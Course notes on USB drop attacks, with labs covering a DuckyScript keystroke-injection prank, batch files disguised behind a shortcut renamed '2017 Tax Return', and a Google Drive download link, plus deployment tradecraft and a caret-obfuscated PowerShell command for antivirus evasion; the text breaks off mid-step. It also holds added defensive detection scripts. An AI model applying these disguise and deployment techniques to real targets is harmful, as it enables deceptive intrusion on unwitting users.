USB Drop Attack Course Notes

Look What I Found! Uh Oh...

USB Drop Attack

Prerequisites
To participate in this course, you will need the following:
● A standard USB flash drive of any size
● A USB device that functions as a Human Interface Device, preferably a USB Rubber
Ducky sold by Hak5 (https://shop.hak5.org/). You can use other devices, like the Malduino
sold by Maltronics (https://maltronics.com/), but the lab will be using the USB Rubber
Ducky.
● A computer with internet access
● Text editing software, preferably Notepad++
● A free Gmail account
● A Windows 10 machine (labs will use attacks against Windows 10 OS)

Learning Objectives
● What is a USB Drop Attack
● Why these attacks are effective
● Types of USB drop attacks
○ USB Human Interface Device (HID) Spoofing
○ Malicious Files/Code
○ Social Engineering Links
○ USB Kill
○ Zero Day
● Disguising attacks
● Reconnaissance
● Deployment
● Building the Attacks
○ USB Human Interface Device (HID) Spoofing
■ Duckyscript
○ Malicious Files/Code
○ Social Engineering Links
● How to defend against USB Drop Attacks
○ Analyzing Devices
○ Red Team Deployments

What is a USB Drop Attack


A USB drop attack occurs when an attacker strategically places a USB device somewhere,
potentially containing malicious code, with the intention of someone picking it up and plugging it
into a computer. This type of attack employs social engineering. Social engineering, in terms of
cyber security, is the use of deceptive means to manipulate individuals into divulging
information or performing some action. In this case, an attacker, or attackers, are attempting to
manipulate victims (targets) into taking a USB device and plugging it into their computer.
Depending on the type of USB drop attack, the attacker may further manipulate victims into
clicking on files loaded onto the USB device.

This type of attack has been used for years by everyone from lowly “script kiddies” all the way to
nation-state hacking groups. The reason it is seen so often is that it can be effective and
difficult to defend against. Depending on how this attack is deployed, it can be targeted at a
single individual or organization or randomly distributed. A famous example of this attack is the
Stuxnet worm. Stuxnet was a malicious worm designed to destroy centrifuges used in a SCADA
system at a specific nuclear plant in Iran. The attack is thought to have been distributed via
USB devices because the SCADA system was disconnected from the internet for security
reasons. Several versions of the worm were found; some exploited several zero-day
vulnerabilities, including in the centrifuges’ control program on Windows machines. It destroyed
approximately a fifth of the centrifuges within the plant. The worm is thought to have been
developed and distributed jointly by the United States and Israel, although both countries have
denied this.

Why are these Attacks Effective


The reason this attack can be so effective is that it turns humans’ natural curiosity and/or
desire to help others against them. When a device that might hold “juicy” information is lying
around, people cannot help but pick it up and see what’s inside. An effective attacker leverages
this innate curiosity to get a victim to take a USB device. Once a device is taken, the odds are
good that the victim will examine its contents. However, many skilled attackers will not simply
hope that victims click the right file. Attackers add enticing files or file names to the device to
further play on the traits that made the victim pick it up in the first place. Even people who are
trained to spot these attacks can still fall for them, because the bait can be so enticing.

However, not all of the blame can be placed on humans. The machines these devices get
plugged into don’t do much checking either. Some machines running Windows simply ask what
you want to do with the device. Once a file is clicked, it is up to the machine’s firewall and
installed antivirus to stop anything malicious. You can run a malware scan once the device is
inserted, but that usually requires forethought from the human controlling the machine. There
are few adequate countermeasures that machines take against strange USB devices that get
inserted.

Types of USB Drop Attacks


USB Human Interface Device (HID) Spoofing
Before talking about USB Human Interface Device (HID) spoofing, we first need to understand
what human interface devices are. HIDs are devices that attach to computers via the USB port,
or similar ports, and allow humans to input data or allow machines to provide output to
humans. Examples of HID devices include keyboards, mice, headphones, microphones, etc.
HID spoofing, in terms of a USB drop attack, tricks a machine into thinking a keyboard is in use
by a human. When the device is plugged into a machine, it can then execute pre-programmed
keystrokes on the machine.

This type of USB drop attack is very versatile because it can be used across different operating
system platforms, including Windows, macOS, and Linux. This attack cannot be used with every
USB device; it requires specific microcontrollers that support keyboard emulation. A
microcontroller is essentially a tiny computer on a single integrated chip. There are a few
different HID devices that can be purchased and used after some setup. Two of the most
popular devices are the USB Rubber Ducky from Hak5 and the Malduino by Maltronics. HID
spoofing devices can also be made from Arduino boards that are close to the size of a typical
flash drive. However, these boards require additional programming and hardware setup to make
them look like typical flash drives. There are also a small number of flash drives that can be
converted into HID devices with some programming. These devices use their own scripting
language, called DuckyScript. DuckyScript is a simple scripting language that can emulate
anything a keyboard can do.

There are some drawbacks to using this type of device in a USB drop attack. Since the device
injects keystrokes, the victim may notice them if they are not properly hidden and unplug the
device before the payload completes. These devices must stay plugged into the target machine
for a predetermined time in order for the attack to be successful. If an alert victim notices
keystrokes, or becomes impatient because no storage becomes visible after plugging it in, the
device may be removed before the payload completes. This is why it is so important, when an
attacker uses this device in an attack, to make payloads that are invisible or only briefly visible
and that complete quickly.

Malicious Files/Code
Another type of USB drop attack is the use of malicious files loaded onto an everyday flash
drive. Once a victim opens a file containing the malicious code, the code activates. What these
malicious files can do is virtually endless, including downloading other malicious files from the
internet. These attacks are limited only by the attacker’s imagination and the machine’s
countermeasures, such as antivirus.

Files used in these attacks are usually given enticing names to get victims to click on them. A
very popular way to get people to click on malicious files is to play on victims’ lust by placing
potentially pornographic pictures on the flash drive. Attackers with less experience may not
know how to disguise files and depend on victims clicking them despite the obvious danger.
More experienced attackers find ways to disguise these files and make the danger harder to
spot. For example, a malicious file can be hidden inside another file, such as an exe file
being placed inside a picture. This technique is known as steganography.

The advantage of this version of the attack over HID spoofing is that the code can run entirely
hidden from view if executed properly. Sometimes victims will have no idea there was an attack
if the code that ran circumvents the malware protection on the machine. Another advantage is
that this attack can be performed with any flash drive that has enough storage, giving attackers
quick and easy access to more readily available devices. A disadvantage of this attack is that
some malicious files can be stopped by the machine’s countermeasures, like antivirus.

Social Engineering Links


This attack involves the use of malicious phishing links. The attacker places website links on
the flash drive that direct the user to a phishing site or to malware. Typically, these malicious
links direct users to websites set up by the attacker that attempt to harvest the victim’s
credentials, extort the victim, download malicious files, or carry out other attacks. These
phishing sites can masquerade as other sites, such as email hosting sites like Gmail, Yahoo,
and others, to trick users into entering their credentials. Although this attack can be combined
with an HID spoofing device by taking the victim to a phishing site with keystroke commands, it
is more likely to be used on an everyday flash drive. There are a few disadvantages to this
attack. It depends on internet access and requires the victim's computer to be connected to the
internet; if the victim is not connected, the attack fails. This attack also tends to rely more
heavily on social engineering to trick gullible users into clicking links and then performing the
desired action on the phishing website.

USB Kill
This attack is the most destructive of all USB drop attacks. When plugged in, the USB Kill
creates a power surge that destroys the machine. The vast majority of devices are not protected
against this type of attack. USB ports in machines have two functions: they power USB
devices and communicate with them. The USB Kill draws power from the machine’s USB power
lines and stores the charge. Once the voltage reaches a certain point, the device discharges
that stored power back through the USB data lines. The device repeats this continuously until
the machine is destroyed or the device is unplugged. A few different versions are sold, with
adapters (Micro USB, USB-C, Lightning) to attach to other types of devices such as
smartphones. Some carry an easy-to-spot emblem. However, some of these devices are hard to
spot because an “anonymous” edition is sold with no markings to indicate it is a USB Kill.

Zero Day
This attack takes advantage of an undiscovered vulnerability in the machine’s software. When
this category of attack is discussed, it almost always references the Stuxnet attack. Stuxnet
was a rare example that used several zero-day vulnerabilities in its targeted attack. Many cyber
security experts also call this a Zero Day Driver attack, because when an external device is
connected the machine installs its driver software, and there exists the possibility of malicious
code being attached to that driver software. Some cyber security experts do not treat this as its
own category but instead place it with the malicious file/code category. The logic for
categorizing it appears to go both ways, making it the most ill-defined category of USB drop
attacks.

Disguising Attacks
These attacks can use several different techniques to hide themselves or make themselves
difficult to spot. Attacks can be disguised not only from the perspective of the user but also from
that of the device. The possibilities are endless, and it would take several hours to discuss them
all. This section will only highlight a few techniques.

As discussed previously, malicious code can be hidden inside other files. The classic example
is disguising an exe file in a picture file. Another way attackers can use steganography is to hide
passwords inside other files. If, for example, an attack needs to exfiltrate data via an email
script, the attacker may pull the password from a hiding place inside a harmless-looking file.
This helps protect the password from being found by the victim. Another very popular method is
to hide malicious macros inside a doc, xls, pdf or other file. Macros are used to automate tasks
but can also be used to run malicious code. From the outside, a document can look normal, but
an attacker can plant malicious code in a macro. Most modern programs like Microsoft Office
disable macros by default and require the user to enable them. This is only a small setback for
most attackers, because many manipulate the victim into turning macros on.

Malicious files can also be placed directly on the flash drive and disguised. There are several
examples of this across operating systems. On Windows machines, files and folders can be
marked hidden. A malicious file can be hidden and a visible shortcut (link file) to it created. This
visible link file can be further disguised by changing its icon and giving it an enticing name. On
macOS or Linux based machines, malicious files can be given a false extension with an extra
space to hide the true file type. This is called “Space after Filename”. Because of the extra
space in the extension, the operating system ignores the extension and runs the file based on
what it determines the true file type to be. For example, if a malicious file named “badfile.bin” is
renamed to “badfile.txt “ (note the extra space at the end), the OS will run the file as a bin file
instead of a txt file. A less sophisticated technique, but still effective, is to add a fake extension
before the real extension. For example, an exe file named badfile.exe could be renamed to
badfile.txt.exe.
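
Detecting the disguised names described above, as an added example that is not part of the original notes (the directory listing it inspects is constructed sample data):

```python
"""Flag file names on a removable drive that use the disguises described above.

Example added to these notes (not part of the original course material). It looks at a
directory listing the way a simple USB triage script would and reports a decoy extension
placed before the real one, whitespace after the extension, files carrying the hidden
attribute, and .lnk shortcuts (Windows never displays the .lnk extension, so a renamed
shortcut such as "2017 Tax Return" looks like a document).
"""
import os

# Types that run code when opened; .lnk is included because a shortcut launches its target.
RUNNABLE_EXTS = {".exe", ".bat", ".cmd", ".com", ".scr", ".ps1", ".vbs", ".js", ".lnk", ".bin"}
# Types a victim expects to be harmless data and that the disguises above imitate.
DECOY_EXTS = {".txt", ".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".xls", ".xlsx"}


def suspicious_name_reasons(name, hidden=False):
    """Return human-readable reasons to distrust a file; empty when the name looks ordinary."""
    reasons = []
    stem, ext = os.path.splitext(name)
    real_ext = ext.strip().lower()  # the type the operating system will actually act on
    if ext != ext.rstrip():
        # "badfile.txt " -- the visible extension is ignored because of the trailing space
        reasons.append("whitespace after the extension; the shown type is not the real type")
    _, inner_ext = os.path.splitext(stem)
    if inner_ext.lower() in DECOY_EXTS and real_ext in RUNNABLE_EXTS:
        # "badfile.txt.exe" -- with known extensions hidden, Explorer shows it as badfile.txt
        reasons.append(f"double extension: displays as {inner_ext} but runs as {real_ext}")
    if real_ext == ".lnk":
        reasons.append("shortcut file; Windows hides the .lnk extension, inspect its target")
    elif real_ext in RUNNABLE_EXTS:
        reasons.append(f"runnable type {real_ext} on removable media")
    if hidden:
        # the lab below hides the real .bat and leaves only a renamed shortcut visible
        reasons.append("hidden attribute set; a visible shortcut may point at it")
    return reasons


def triage_listing(entries):
    """Map each flagged name in [(name, hidden), ...] to its list of reasons."""
    flagged = {}
    for name, hidden in entries:
        reasons = suspicious_name_reasons(name, hidden)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed listing of a drive prepared the way the labs below describe (sample data).
SAMPLE_LISTING = [
    ("vacation.jpg", False),
    ("2017 Tax Return.lnk", False),      # renamed shortcut; Explorer shows "2017 Tax Return"
    ("TemptingLookingFile.bat", True),   # hidden target of that shortcut
    ("badfile.txt ", False),             # space after the extension
    ("badfile.txt.exe", False),          # decoy extension before the real one
    ("notes.txt", False),
]

if __name__ == "__main__":
    for name, reasons in triage_listing(SAMPLE_LISTING).items():
        print(f"{name!r}:")
        for reason in reasons:
            print(f"  - {reason}")
```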

Many malicious files not only have to evade the user’s detection but also the device’s malware
detection. Files that employ the aforementioned methods also have to avoid being caught by
the machine’s countermeasures or the attack can fail. One method attackers use is
obfuscating commands. For example, an attacker who launches a PowerShell window from a
Windows batch file with a command written as “p^O^w^e^R^S^he^L^L.e^x^e” instead of
“powershell.exe” may successfully avoid some antivirus programs’ detection.
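
A scanner that undoes the caret escaping shown above before matching, as an added example that is not part of the original notes (the batch text it scans is constructed sample data):

```python
"""Undo cmd.exe caret obfuscation so a launcher name can be matched by a scanner.

Example added to these notes (not part of the original course). cmd.exe drops each caret
and keeps the character after it, except inside double quotes, where carets are literal.
A signature that looks for "powershell.exe" in the raw batch text therefore misses the
escaped spelling quoted above; matching on the normalised text does not.
"""

# Interpreters a disguised batch file commonly hands off to; matched on normalised text.
LAUNCHERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32")


def normalize_cmd(line):
    """Return the line as cmd.exe sees it after caret processing, lower-cased."""
    out = []
    in_quotes = False
    i = 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quotes = not in_quotes  # a double quote toggles literal mode
            out.append(ch)
        elif ch == "^" and not in_quotes:
            i += 1  # the caret itself is dropped ...
            if i < len(line):
                out.append(line[i])  # ... and the character after it is kept verbatim
            # a caret at the very end of a line is a line continuation and yields nothing
        else:
            out.append(ch)
        i += 1
    return "".join(out).lower()


def find_launchers(batch_text):
    """Return (line_no, normalised_line, carets_removed) for lines naming a launcher."""
    hits = []
    for line_no, raw in enumerate(batch_text.splitlines(), start=1):
        norm = normalize_cmd(raw)
        if any(name in norm for name in LAUNCHERS):
            hits.append((line_no, norm, norm != raw.lower()))
    return hits


# Constructed sample: the escaped spelling from the text, plus a quoted line that must not
# be unescaped (carets inside quotes stay literal).
SAMPLE_BATCH = """@echo off
p^O^w^e^R^S^he^L^L.e^x^e -NoProfile
echo "^powershell^ inside quotes is literal text"
dir
"""

if __name__ == "__main__":
    for line_no, norm, obfuscated in find_launchers(SAMPLE_BATCH):
        tag = "caret-obfuscated" if obfuscated else "plain"
        print(f"line {line_no} ({tag}): {norm}")
```
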

Reconnaissance and Deployment
Any good attacker will put a great deal of thought and effort not only into the code and/or
malicious links on the device itself but also into the deployment of the device. There are several
things an attacker will try in order to get a target to take a device and plug it into their machine.
If an attacker does a poor job of deploying the attack, it does not matter how much effort they
put into the code on the device if the target does not take it. Even if a target does take a device,
the attacker still has to get them to plug it into the target machine. There are several things a
seasoned attacker will do to increase the odds that the attack will be successful. Planning the
deployment may differ depending on the type of attack, the target or targets, or other factors.
There are several strategies that may or may not be used, greatly expanded on, or used in a
different order depending on the attack operation. The time an attacker spends researching
deployment strategies is known as reconnaissance, or recon for short. Recon, in terms of cyber
security, means to gather information on a target or targets. In a USB drop attack, an attacker
can recon victims and target machines in person and/or through a computer.

What to Look for During Reconnaissance


There are several things an attacker must know before deploying their attack. One of the first
things an attacker will do is choose a target. Who is most likely to plug in a strange USB
device? Does the machine hold the information I need for the attack? If the attack is against a
single individual, then this step requires little thought; it is just a matter of getting them to take
the device and plug it in. If the attack is against a large multinational organization, then it
requires a lot more planning, and it can take some work to figure out which person or persons
would be a good target. Recon on the potential target machines is also very important. Is the
machine running Windows, macOS, or Linux? How quickly does the machine or machines
operate? What kind of antivirus is installed? Is it protected by a 24/7 Security Operations Center
(SOC) that constantly monitors for attacks? The answers to these questions about the target
machine or machines will ultimately shape the type of attack that is launched. Attackers will also
need to recon a place or places to leave a USB device. Where to place a device depends on the
scope of the attack. If the attack is against a single individual, they will need to leave it
somewhere only that target will find it. If the attack is against many people, it may be easy to
leave devices in a general area to be discovered. Another important factor to consider is the risk
of being caught when leaving the device. If the device is going to be left in a public area, the risk
is low. If the device is going to be placed on a target’s desk in a high-security facility, the risk is
very high.

Deploying the Device(s)


Once an attacker has done all their recon work and tailored their attack, it is time to deploy the
device or devices. The way a device gets deployed depends on many factors. If it’s a wide-open
area with no security measures, deployment can be easy. If it requires access to a building with
high security, this stage will be difficult. A good rule of thumb is to not look suspicious. If an
attacker arrives at the drop location looking back and forth quickly and then throws a device in
front of them, people can grow suspicious. If, however, an attacker casually walks to the drop
area and nonchalantly drops the device, most people would not even notice. The key idea is to
act like you belong, to blend in with the people around you. If an attacker walks around a fancy
office building with ripped pants and a long beard, they will get noticed. If instead they walk
around clean shaven and in a nice suit, no one may notice them.

There are several things an attacker will do to increase the chances of the device being
taken. The attacker can put the device on a keyring with keys, put a label on it, or distress the
item to make it look used. This is really dependent on the situation, but leaving a brand-new
looking device all by itself may not work as well. For example, if the attack is against a company
with trade secrets that could affect its profits if leaked, an attacker could leave a device labeled
“confidential” just outside the building. Sometimes putting the device on a keyring with keys can
backfire. For example, the target may be a member of upper-level management, but someone
may end up turning the device in to lost and found thinking someone lost their keys. This is one
of many reasons attackers typically deploy several devices. Many devices get taken by the
wrong person, get taken and never plugged into the right machine, or never get taken at all.

Building the Attacks


USB Rubber Ducky (HID) Spoofing Lab
Although there are several devices that can be used in an HID spoofing attack, I will limit my
demonstration to the USB Rubber Ducky, which can be found at https://shop.hak5.org/. As
discussed previously, you can use other devices like the Malduino from Maltronics or Arduino
boards that are similar in size to a flash drive. I chose the USB Rubber Ducky because it is the
only device sold that comes with an enclosure made to look like a normal flash drive.

To follow along with this demonstration you will need the following:
● USB Rubber Ducky
● A computer with internet access
● A machine with Windows 10 OS (the attack will be against a Windows 10 machine)
● Notepad++ or another text editor

I prefer to use Notepad++ as my text editor because it is free, and you can install scripting
languages into the program. I will be performing my demonstrations with Notepad++. You can
acquire the program here: https://notepad-plus-plus.org/. If you are using Linux or macOS,
Sublime Text would be a good alternative: https://www.sublimetext.com/. Installing the Ducky
scripting language pack is not required but can be helpful when scripting. To install the
DuckyScript language pack into Notepad++, follow these steps:
1. Visit https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Downloads and download
the User Defined Language (UDL) for Notepad++
2. Unzip the folder
3. Open Notepad++ and navigate to “Languages” in the top menu
4. In the drop-down box of “Languages”, select “Define your Language”
5. A menu box should open with the title “User Defined Language”. Click on the “Import”
button near the top of the menu box.
6. Navigate to the unzipped folder downloaded in step one, and select
“userDefineLang.xml”
7. Once the xml file has been imported, a dialog box will pop up stating the import was
successful
8. After importing, close the “User Defined Language” menu, then close the program
9. Reopen the program and navigate to “Languages” in the top menu. There should be a
new scripting language called “DuckyScript”. You can now select it when scripting with
DuckyScript.

After getting your text editor ready to go, let’s learn how to use the USB Rubber Ducky. The
Rubber Ducky comes with a removable outer case that resembles a flash drive. On the board
itself, there is a slot for a micro SD storage card, an LED indicator light, a replay button, and a
type A (USB) plug. The device also comes with a micro SD card and a micro SD to USB
adapter. The scripts you write are saved on the micro SD card, and then the micro SD card is
placed into the Rubber Ducky’s micro SD storage slot. Only one script at a time can be placed
on the root of the micro SD card and used. Other scripts can be stored in a folder on the micro
SD card and used later if they are moved to the root and the other script is removed. For scripts
to run they must be encoded and saved as inject.bin. In this course, we will be using
https://ducktoolkit.com/encoder/ to encode payloads after writing them.

DuckyScript
If you have no experience with any kind of scripting language, DuckyScript is a great place to
start. With practice, you can easily master the language. Each command of this scripting
language has its own line, meaning each line should start with a command. The commands are
written in all caps, which helps distinguish them from the rest of the line. Let’s explore what
commands you can use and what each does. The following list can also be found at this website:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript. Here is a list of the
commands that can be used:
● DEFAULT_DELAY or DEFAULTDELAY: defines (in milliseconds) how long to wait
before executing the next command. This is an optional command. For example,
DEFAULTDELAY 100.
● DELAY: Creates a pause in the script before continuing to the next command (in
milliseconds). Can range from 1 to 10000 milliseconds.
● REM: Allows commenting and is not processed in the script.
● STRING: This command is used when text is needed to be entered. Text is entered
exactly as is following this command.
● GUI or WINDOWS: This enters the Windows key on a Windows machine.
● APP or MENU: This imitates the context menu key also known as the App key or menu
key.
● SHIFT: Used to select text and navigate through fields. Can be used in conjunction
with DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW,
DOWNARROW, LEFTARROW, RIGHTARROW, and TAB.
● DELETE: Imitates the delete key.
● HOME: Imitates the home key.
● INSERT: Imitates the insert key.
● PAGEUP: Imitates the pageup key.
● PAGEDOWN: Imitates the pagedown key.
● UPARROW or UP: Imitates the up arrow key.
● DOWNARROW or DOWN: Imitates the down arrow key.
● LEFTARROW or LEFT: Imitates the left arrow key.
● RIGHTARROW or RIGHT: Imitates the right arrow key.
● TAB: Imitates the tab key.
● ALT: Imitates the alt key. Can be used in conjunction with END, ESC, ESCAPE, F1, F2,
F3, F4, F5, F6, F7, F8, F9, F10, F11, F12, Single Characters, SPACE, and TAB.
● CONTROL or CTRL: Imitates the ctrl key. Can be used in conjunction with BREAK,
PAUSE, F1, F2, F3, F4, F5, F6, F7, F8, F9, F10, F11, F12, ESCAPE, ESC, and Single
Characters.
● BREAK or PAUSE: Imitates the pause/break key.
● CAPSLOCK: Imitates the capslock key.
● END: Imitates the end key.
● ESC or ESCAPE: Imitates the esc key.
● NUMLOCK: Imitates the numlock key.
● PRINTSCREEN: Imitates the printscreen key.
● SCROLLLOCK: Imitates the scroll lock key.
● SPACE: Imitates the space key.
● ENTER: Imitates the enter key.
● REPEAT: Repeats the previous command. For example, “REPEAT 10” will repeat the
previous command ten times.

When writing a script with DuckyScript, it can take several revisions of the code to get it working
properly. Before deployment, it is imperative that the script is perfected on a practice machine.
There are several things to keep in mind when writing a script. First, delays are very important.
If the delays are too short, commands can execute before the machine is ready for them. This
can render the rest of the script worthless after the incorrect delay. If delays are made too long,
a user could unplug the device before the script completes. Another thing to keep in mind is that
every machine is different. Some machines are lightning quick, others are slow as a turtle. It is
important to keep in mind how quick or slow the target machine is and tailor the script
accordingly. This involves some recon of the target device. If this is not possible, it is a good
idea to write the script to execute at a speed most machines can handle. Remember, anything
you can do with a keyboard you can do with this attack. It just takes some knowledge and
patience when building the script.

If you would like to see example payloads, visit this website:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Some of the payloads on this
site are out of date and need some tweaking to get working properly. However, this is a great
place to get started if you want to learn DuckyScript.
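
A lint pass over DuckyScript source, as an added example that is neither Hak5's encoder nor part of the original notes; it assumes the command semantics listed above, treats DEFAULT_DELAY as a wait inserted before every subsequent command, and embeds the script from the HID Spoofing Lab below so the check has something to run on:

```python
"""Lint a DuckyScript file and estimate how long the device must stay plugged in.

Example added to these notes (not Hak5's encoder): each line is checked against the command
list above, and DELAY / DEFAULT_DELAY values are summed into the minimum time the device is
connected before its payload finishes, the window in which an alert user can pull it.
"""

# Keys that stand alone on a line.
BARE_KEYS = {
    "DELETE", "HOME", "INSERT", "PAGEUP", "PAGEDOWN", "UPARROW", "UP", "DOWNARROW",
    "DOWN", "LEFTARROW", "LEFT", "RIGHTARROW", "RIGHT", "TAB", "BREAK", "PAUSE",
    "CAPSLOCK", "END", "ESC", "ESCAPE", "NUMLOCK", "PRINTSCREEN", "SCROLLLOCK",
    "SPACE", "ENTER", "MENU", "APP",
}
# Modifiers may be followed by a second key on the same line, e.g. "GUI r" or "ALT F4".
MODIFIERS = {"GUI", "WINDOWS", "SHIFT", "ALT", "CONTROL", "CTRL"}
FUNCTION_KEYS = {f"F{n}" for n in range(1, 13)}

def lint_duckyscript(source):
    """Return (errors, total_delay_ms); errors is a list of 'line N: ...' strings."""
    errors, total_ms, default_ms = [], 0, 0
    prev = None  # (command, argument) of the last executed line, needed by REPEAT
    for lineno, raw in enumerate(source.splitlines(), start=1):
        cmd, _, arg = raw.strip().partition(" ")
        if not cmd or cmd == "REM":
            continue  # blank lines and comments are never typed at the target
        if cmd == "REPEAT":
            if not arg.isdigit():
                errors.append(f"line {lineno}: REPEAT needs a count")
            elif prev is None:
                errors.append(f"line {lineno}: REPEAT has no previous command to repeat")
            else:
                # each repetition waits the default delay; a repeated DELAY waits again too
                again = int(prev[1]) if prev[0] == "DELAY" and prev[1].isdigit() else 0
                total_ms += int(arg) * (default_ms + again)
            continue
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            if arg.isdigit():
                default_ms = int(arg)
            else:
                errors.append(f"line {lineno}: {cmd} needs a value in milliseconds")
            continue
        total_ms += default_ms  # the default delay precedes every command after it is set
        if cmd == "DELAY":
            if arg.isdigit() and 1 <= int(arg) <= 10000:
                total_ms += int(arg)
            else:
                errors.append(f"line {lineno}: DELAY must be 1-10000 ms, got {arg!r}")
        elif cmd == "STRING":
            if not arg:
                errors.append(f"line {lineno}: STRING has no text to type")
        elif cmd in MODIFIERS:
            if arg and not (len(arg) == 1 or arg in BARE_KEYS
                            or arg in FUNCTION_KEYS or arg in MODIFIERS):
                errors.append(f"line {lineno}: {cmd} cannot be combined with {arg!r}")
        elif cmd in BARE_KEYS:
            if arg:
                errors.append(f"line {lineno}: {cmd} takes no argument")
        else:
            errors.append(f"line {lineno}: unknown command {cmd!r} (commands are all caps)")
        prev = (cmd, arg)
    return errors, total_ms

# The lab script from these notes, copied verbatim so the lint can be checked against it.
LAB_SCRIPT = r"""DELAY 5000
GUI d
DELAY 200
PRINTSCREEN
DELAY 200
MENU
DELAY 200
STRING v
DELAY 200
STRING d
GUI r
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL v
DELAY 200
ALT f
STRING s
DELAY 500
STRING %userprofile%\prankwallpaper.jpg
ENTER
DELAY 200
ALT f
DELAY 200
STRING b
DELAY 200
ALT F4
DELAY 200
GUI d
"""

if __name__ == "__main__":
    print(lint_duckyscript(LAB_SCRIPT))  # ([], 8500) for the lab script
```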

HID Spoofing Lab


Now that you know the basics of DuckyScript, I will show you an example. In this example, I will
be writing a script to attack a Windows 10 machine. This will be a simple script that will minimize
all windows, take a screenshot of the desktop, disable the desktop icons, save the screenshot in
the current user’s folder, and set the screenshot as the wallpaper. Although not exactly
malicious, this script is rather annoying for victims. The script uses longer delays in order to
work on most devices. It can be tweaked to run quicker or slower by changing the delays.
You will need the following in order to participate:
● A USB Rubber Ducky
● A text editor like Notepad++

The following are the steps to complete the lab:


1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. On the top menu click on languages, then select DuckyScript on the drop down menu
3. Enter the following code:
DELAY 5000
GUI d
DELAY 200
PRINTSCREEN
DELAY 200
MENU
DELAY 200
STRING v
DELAY 200
STRING d
GUI r
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL v
DELAY 200
ALT f
STRING s
DELAY 500
STRING %userprofile%\prankwallpaper.jpg
ENTER
DELAY 200
ALT f
DELAY 200
STRING b
DELAY 200
ALT F4
DELAY 200
GUI d
4. Once the code has been entered, save the text file
5. Open your browser and navigate to https://ducktoolkit.com/encoder/
6. Copy the code from the text file and paste it into the Duck Code text box on the website
7. Then on the right, under “language”, select the language that matches the machine this
script will be used against. (In this case, United States will be used)
8. Once selected, click on “Generate Script”. If there are any command errors in the code,
the website should let you know.
9. After generating the script, there should be an “Inject.bin” button. Click the “Inject.bin”
button. The script will start downloading.
10. After downloading, insert the microSD card into the USB to microSD adapter. Then plug
it into your machine.
11. Find the “Inject.bin” script file that was downloaded in step 9, and place it in the root of the
microSD card.
12. Eject the USB to microSD adapter.
13. Remove the cover from the USB Rubber Ducky and place the microSD card into the
microSD slot on the HID device.
14. Put the cover back together with the metal piece. The device should be ready to go.

Malicious File/Code Lab


In this lab, I will show you how to perform this attack with the visible link file method
(discussed earlier) on a Windows 10 machine. You will need the following in order to participate:
● A standard USB flash drive
● A computer with internet access
● A machine with Windows 10 OS (the attack will be against a Windows 10 machine)
● A text editor like Notepad++

In this attack, I will be creating a batch file (.bat) that displays messages in the command
prompt claiming that files are being stolen. In reality, nothing is being stolen; only messages are
being displayed. A batch file is a Windows script file that runs in the command prompt. After
creating the batch file, I will hide the file, create a visible link to it, and disguise the link.

The following are the steps to complete this lab:


1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. Enter the following code into the text editor:
@echo Virus Activated! Hacking in progress...
@echo off
TIMEOUT /T 2 /NOBREAK >nul
echo Looking for files to steal. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
cd /d C:
dir
TIMEOUT /T 5 /NOBREAK >nul
cls
echo Sensitive files found!
TIMEOUT /T 5 /NOBREAK >nul
echo Exporting files to hackers. Please wait...
TIMEOUT /T 5 /NOBREAK >nul
echo Success!
TIMEOUT /T 5 /NOBREAK >nul
echo Thank you for the personal data!
TIMEOUT /T 20 /NOBREAK >nul
exit
3. Save the text as “TemptingLookingFile.bat”
4. Plug in your USB flash drive into your machine.
5. Copy the TemptingLookingFile.bat file onto the flash drive.
6. After copying the file, right click the file on the flash drive and select “Create Shortcut”. A
shortcut file to the TemptingLookingFile.bat named “TemptingLookingFile.bat - Shortcut”
should appear on the flash drive.
7. Rename the shortcut file from “TemptingLookingFile.bat - Shortcut” to “2017 Tax Return”
8. Right Click on the original TemptingLookingFile.bat and select “Properties”.
9. A pop up window should appear named “TemptingLookingFile.bat Properties”
10. On the first tab, “General”, navigate near the bottom to Attributes. Check the box next
to “Hidden”. Select “OK” at the bottom of the window. The original bat file should now be
hidden from view, and the shortcut file should be the only one remaining.
11. Right click on the shortcut file named “2017 Tax Return” and select properties in the
menu that appears.
12. Once in the “Properties” menu, select “Change Icon…”
13. Select the icon shown in the original notes (image not reproduced here), or an icon that is
similar. Then select “OK”, then “OK” again.

Social Engineering Links Lab


In this lab, I will be using a batch file similar to the one used in the previous lab. The difference in
this attack is that I will be placing a link file on a flash drive that downloads the batch file from
Google Drive. I will add a separate text file to the flash drive to try to trick a victim into running
the downloaded file. You will need the following in order to participate:
● A standard USB flash drive
● A computer with internet access
● A machine with Windows OS (the attack will be against a Windows 10 machine)
● A text editor like Notepad++
● A Google Drive account to upload the file to (signing up is free)

The following are the steps to complete this lab:


1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. Enter the following code into the text editor:
@echo Why are you trying to look at my credit card info? Now you will pay!
@echo off
TIMEOUT /T 2 /NOBREAK >nul
echo Virus Activated! Hacking in progress...
TIMEOUT /T 2 /NOBREAK >nul
echo Looking for financial info to steal. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
cd /d C:
dir
TIMEOUT /T 5 /NOBREAK >nul
cls
echo Sensitive financial files found!
TIMEOUT /T 5 /NOBREAK >nul
echo Exporting files to hackers. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
echo Success! Spending spree in progress...
TIMEOUT /T 28 /NOBREAK >nul
echo Thank you!
TIMEOUT /T 20 /NOBREAK >nul
exit
3. Save the text as “CreditCardInfo.bat”
4. Open your browser and create a free Gmail account at gmail.com
5. Once the account is created, navigate to drive.google.com
6. Once there, upload the CreditCardInfo.bat file to Google Drive.
7. Once the file is uploaded, right click the file in Google Drive and select “Get Shareable
Link”
8. Copy the shareable link. The link to the Google Drive file will look something like this:
https://drive.google.com/open?id=RandomText
9. To make the file immediately downloadable, delete “open?” and insert
